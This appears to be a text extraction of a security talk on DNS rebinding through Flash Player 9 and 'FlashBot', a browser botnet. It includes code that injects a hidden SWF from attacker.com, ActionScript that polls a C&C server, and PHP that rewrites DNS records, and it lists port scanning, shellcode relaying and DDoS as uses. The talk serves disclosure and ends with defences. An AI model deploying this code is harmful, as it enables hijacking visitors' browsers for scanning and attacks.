Zombilizing The Web Browers Via Flash Player 9 Thai N. Duong <thaidn AT gmail DOT com> http://vnhacker.blogspot.com

Thai N. Duong

<thaidn AT gmail DOT com>

Overview Flash Player 9 and its potential weaknesses Socket class Breaking the same-origin policy using crossdomain.xml and DNS Spoofing Exploiting the weaknesses Introducing FlashBot Demo Workarounds

Flash Player 9 and its potential weaknesses

Socket class

Breaking the same-origin policy using crossdomain.xml and DNS Spoofing

Exploiting the weaknesses

Introducing FlashBot

Demo

Workarounds

Flash Player 9 Socket class Quote from Flash 9 documentation “ The Socket class enables ActionScript code to make socket connections and to read and write raw binary data. The Socket class is useful for working with servers that use binary protocols.”

Quote from Flash 9 documentation

“ The Socket class enables ActionScript code to make socket connections and to read and write raw binary data. The Socket class is useful for working with servers that use binary protocols.”

Flash Player 9 Socket class Quote from Flash 9 documentation “ The Socket class enables ActionScript code to make socket connections and to read and write raw binary data. The Socket class is useful for working with servers that use binary protocols.” Let's port nmap to ActionScript !

Quote from Flash 9 documentation

“ The Socket class enables ActionScript code to make socket connections and to read and write raw binary data. The Socket class is useful for working with servers that use binary protocols.”

Flash Player 9 Socket class Quote from Flash 9 documentation “ The Socket class enables ActionScript code to make socket connections and to read and write raw binary data. The Socket class is useful for working with servers that use binary protocols.” Let's port nmap to ActionScript ! Err wait, how about the same-origin policy ?

Quote from Flash 9 documentation

“ The Socket class enables ActionScript code to make socket connections and to read and write raw binary data. The Socket class is useful for working with servers that use binary protocols.”

Let's port nmap to ActionScript !

Err wait, how about the

same-origin policy ?

Same-Origin Policy originally released with Netscape Navigator 2.0 and has been incorporated into every major browser since prevents a document or script loaded from one site of origin from manipulating properties of or communicating with a document loaded from another site of origin origin = domain name + port + protocol

originally released with Netscape Navigator 2.0 and has been incorporated into every major browser since

prevents a document or script loaded from one site of origin from manipulating properties of or communicating with a document loaded from another site of origin

origin = domain name + port + protocol

Same-Origin Policy

Flash Player 9 Same-Origin Policy

Breaking the SOP: crossdomain.xml A SWF file from a.com may read from the server at b.com (using the Socket class, for example) if b.com has a cross-domain policy file that permits access from a.com (or from all domains). <?xml version=&quot;1.0&quot;?> <!DOCTYPE cross-domain-policy SYSTEM &quot;http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd&quot;> <cross-domain-policy> <allow-access-from domain=”*” to-ports=”*” /> </cross-domain-policy> Yahoo! - http://api.search.yahoo.com/crossdomain.xml YouTube - http://www.youtube.com/crossdomain.xml Amazon.com - http://www.amazon.com/crossdomain.xml

A SWF file from a.com may read from the server at b.com (using the Socket class, for example) if b.com has a cross-domain policy file that permits access from a.com (or from all domains).

<?xml version=&quot;1.0&quot;?>

<!DOCTYPE cross-domain-policy SYSTEM &quot;http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd&quot;>

<cross-domain-policy>

<allow-access-from domain=”*” to-ports=”*” />

</cross-domain-policy>

Yahoo! - http://api.search.yahoo.com/crossdomain.xml

YouTube - http://www.youtube.com/crossdomain.xml

Amazon.com - http://www.amazon.com/crossdomain.xml

DNS Pinning Explained same-origin policy origin = domain name + port + protocol

same-origin policy

origin = domain name + port + protocol

DNS Pinning Explained same-origin policy origin = domain name + port + protocol DNS is not static, and host names could potentially resolve to different addresses over the course of a browsing session. Dynamic DNS anybody? Browsers use DNS pinning to prevent attackers from manipulating DNS timeouts to their advantage. DNS pinning means that once an address is returned for a host name it is used for the duration of the browsing session, regardless of the DNS timeout associated with the domain

same-origin policy

origin = domain name + port + protocol

DNS is not static, and host names could potentially resolve to different addresses over the course of a browsing session. Dynamic DNS anybody?

Browsers use DNS pinning to prevent attackers from manipulating DNS timeouts to their advantage. DNS pinning means that once an address is returned for a host name it is used for the duration of the browsing session, regardless of the DNS timeout associated with the domain

DNS Pinning same-origin policy origin = domain name + port + protocol DNS is not static, and host names could potentially resolve to different addresses over the course of a browsing session. Browsers use DNS pinning to prevent attackers from manipulating DNS timeouts to their advantage. DNS pinning means that once an address is returned for a host name it is used for the duration of the browsing session, regardless of the DNS timeout associated with the domain fact: Flash Player does not pin DNS at all.

same-origin policy

origin = domain name + port + protocol

DNS is not static, and host names could potentially resolve to different addresses over the course of a browsing session.

Browsers use DNS pinning to prevent attackers from manipulating DNS timeouts to their advantage. DNS pinning means that once an address is returned for a host name it is used for the duration of the browsing session, regardless of the DNS timeout associated with the domain

fact: Flash Player does not pin DNS at all.

Breaking the SOP: DNS Spoofing The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second.

The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second.

Breaking the SOP: DNS Spoofing The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second. ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired.

The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second.

ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired.

Breaking the SOP: DNS Spoofing The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second. ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired. Since the DNS is not longer valid, the user's Flash Player connects to the DNS server to ask where www.attacker.com is now located.

The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second.

ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired.

Since the DNS is not longer valid, the user's Flash Player connects to the DNS server to ask where www.attacker.com is now located.

Breaking the SOP: DNS Spoofing The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second. ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired. Since the DNS is not longer valid, the user's Flash Player connects to the DNS server to ask where www.attacker.com is now located. The DNS server, controlled by attackers, responds with 111.111.111.111, which points to www.example.com.

The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second.

ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired.

Since the DNS is not longer valid, the user's Flash Player connects to the DNS server to ask where www.attacker.com is now located.

The DNS server, controlled by attackers, responds with 111.111.111.111, which points to www.example.com.

Breaking the SOP: DNS Spoofing The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second. ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired. Since the DNS is not longer valid, the user's Flash Player connects to the DNS server to ask where www.attacker.com is now located. The DNS server, controlled by attackers, responds with 111.111.111.111, which points to www.example.com The SWF file located on www.attacker.com now has full access to www.example.com

The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second.

ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired.

Since the DNS is not longer valid, the user's Flash Player connects to the DNS server to ask where www.attacker.com is now located.

The DNS server, controlled by attackers, responds with 111.111.111.111, which points to www.example.com

The SWF file located on www.attacker.com now has full access to www.example.com

FlashBot 101 an 130KB SWF file written in ActionScript 3.0 that works on all web browsers supporting Flash Player 9 once loaded on victim web browsers, FlashBot can leverage victim computers to execute commands received from a C&C server commands that FlashBot understands: port scaning socket relaying (i.e., to send shellcode) launching web DDoS attacks

an 130KB SWF file written in ActionScript 3.0 that works on all web browsers supporting Flash Player 9

once loaded on victim web browsers, FlashBot can leverage victim computers to execute commands received from a C&C server

commands that FlashBot understands:

port scaning

socket relaying (i.e., to send shellcode)

launching web DDoS attacks

How FlashBot works FlashBot is secretly inserted into www.example.com via JavaScript or iframe: function source() { return &quot;http://&quot; + Math.random().toString().substr(2) + &quot;.&quot; + &quot;attacker.com/ flashbot .swf&quot; ; } document.write('<object width=&quot;1&quot; height=&quot;1&quot;>'); document.write('<embed src=&quot;' + source() + '&quot; type=&quot;application/x-shockwave-flash&quot; width=&quot;1&quot; height=&quot;1&quot;>'); document.write('</embed></object>');

FlashBot is secretly inserted into www.example.com via JavaScript or iframe:

function source() {

return &quot;http://&quot; + Math.random().toString().substr(2) + &quot;.&quot; + &quot;attacker.com/ flashbot .swf&quot; ;

}

document.write('<object width=&quot;1&quot; height=&quot;1&quot;>');

document.write('<embed src=&quot;' + source() + '&quot; type=&quot;application/x-shockwave-flash&quot; width=&quot;1&quot; height=&quot;1&quot;>');

document.write('</embed></object>');

How FlashBot works Victim visits www.example.com to load FlashBot from http://<random-subdomain>.attacker.com/flashbot.swf ActionScript in FlashBot connects back to the C&C server: private function getCommand(subdomain:String, domain:String):void { var cnc: String = &quot;http://cnc&quot; + &quot;.&quot; + domain; var connection:NetConnection = new NetConnection(); connection.connect(cnc + &quot;/flashservices/gateway.php&quot;); connection.call(&quot;FlashBot.getCommand&quot;, responder, subdomain, domain); }

Victim visits www.example.com to load FlashBot from http://<random-subdomain>.attacker.com/flashbot.swf

ActionScript in FlashBot connects back to the C&C server:

private function getCommand(subdomain:String, domain:String):void {

var cnc: String = &quot;http://cnc&quot; + &quot;.&quot; + domain;

var connection:NetConnection = new NetConnection();

connection.connect(cnc + &quot;/flashservices/gateway.php&quot;);

connection.call(&quot;FlashBot.getCommand&quot;, responder, subdomain, domain);

}

How FlashBot works C&C server sends to FlashBot a command which is associated with a target IP address C&C server automatically updates the DNS server (powered by PowerDNS) to map the subdomain of victim to the target IP address: $query = &quot;SELECT 1 FROM records WHERE name = ' $record_name '&quot;; $result = mysql_query($query); if ( mysql_num_rows($result) ) { $query = &quot;UPDATE records SET content=' $ip ' WHERE name='$record_name'&quot;; } else { $query = &quot;INSERT INTO records VALUES (NULL, 2, '$record_name', 'A', '$ip', ' 6 ', NULL, NULL)&quot;; }

C&C server sends to FlashBot a command which is associated with a target IP address

C&C server automatically updates the DNS server (powered by PowerDNS) to map the subdomain of victim to the target IP address:

$query = &quot;SELECT 1 FROM records WHERE name = ' $record_name '&quot;;

$result = mysql_query($query);

if ( mysql_num_rows($result) ) {

$query = &quot;UPDATE records SET content=' $ip ' WHERE name='$record_name'&quot;;

}

else {

$query = &quot;INSERT INTO records VALUES (NULL, 2, '$record_name', 'A', '$ip', ' 6 ', NULL, NULL)&quot;;

}

How FlashBot works ActionScript in FlashBot waits for the DNS information expires: timer1 = new Timer( 10 * 1000, 1 ); timer1.addEventListener( TimerEvent.TIMER, exeCommand ); timer1.start(); FlashBot executes the command, and (optionally) sends the result back to C&C then to start over the whole process.

ActionScript in FlashBot waits for the DNS information expires:

timer1 = new Timer( 10 * 1000, 1 );

timer1.addEventListener( TimerEvent.TIMER, exeCommand );

timer1.start();

FlashBot executes the command, and (optionally) sends the result back to C&C then to start over the whole process.

Show Time! - set your DNS server to 221.133.4.24 - start Wireshark to see what you send out!

Demo 1: port scanning works on Firefox scan 127.0.0.1 scan all other hosts in the same subnet with the victim http://www.example.com/scanport.html

works on Firefox

scan 127.0.0.1

scan all other hosts in the same subnet with the victim

http://www.example.com/scanport.html

Demo 2: socket relaying works on all browsers supporting Flash Player 9 relay socket connection to any IP address in the intranets and the Internet can be used to send shellcodes, spam mails, launch DDoS attacks http://www.example.com/relay.html

works on all browsers supporting Flash Player 9

relay socket connection to any IP address in the intranets and the Internet

can be used to send shellcodes, spam mails, launch DDoS attacks

http://www.example.com/relay.html

Workarounds disable Flash Player (and all other plugins) in your web browser. still want to watch youtube.com? use Firefox + NoScript + FlashBlock restrict browser access to only port 80 and 443 using a personal firewall

disable Flash Player (and all other plugins) in your web browser.

still want to watch youtube.com? use Firefox + NoScript + FlashBlock

restrict browser access to only port 80 and 443 using a personal firewall

Thanks DAB Security Team VNSecurity Team, esp. rd and aquynh http://christ1an.blogspot.com http://www.jumperz.net theresacow: I own you a hug ;).

DAB Security Team

VNSecurity Team, esp. rd and aquynh

http://christ1an.blogspot.com

http://www.jumperz.net

theresacow: I own you a hug ;).

Zombilizing The Web Browers Via Flash Player 9 Thank you! Questions/Comments? Thai N. Duong

Thank you!

Questions/Comments?